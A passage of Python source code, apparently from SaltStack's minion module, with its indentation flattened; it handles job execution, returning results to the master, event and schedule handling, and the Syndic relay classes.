if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
if hasattr(self, 'proxy'):
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify, proxy=self.proxy)
# Proxies have a chicken-and-egg problem. Usually we load grains early
# in the setup process, but we can't load grains for proxies until
# we talk to the device we are proxying for. So force a grains
# sync here.
# Hmm...We can't seem to sync grains here, makes the event bus go nuts
# leaving this commented to remind future me that this is not a good idea here.
# self.functions['saltutil.sync_grains'](saltenv='base')
else:
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
try:
ret = channel.send(load)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True)
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
self.functions, self.returners, self.function_errors = self._load_modules()
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if hasattr(self, 'connected') and self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
try:
self._fire_master('ping', 'minion_ping')
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(self._handle_payload)
else:
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid],
'_syndic_return',
timeout=self._return_retry_timer())
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics.result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
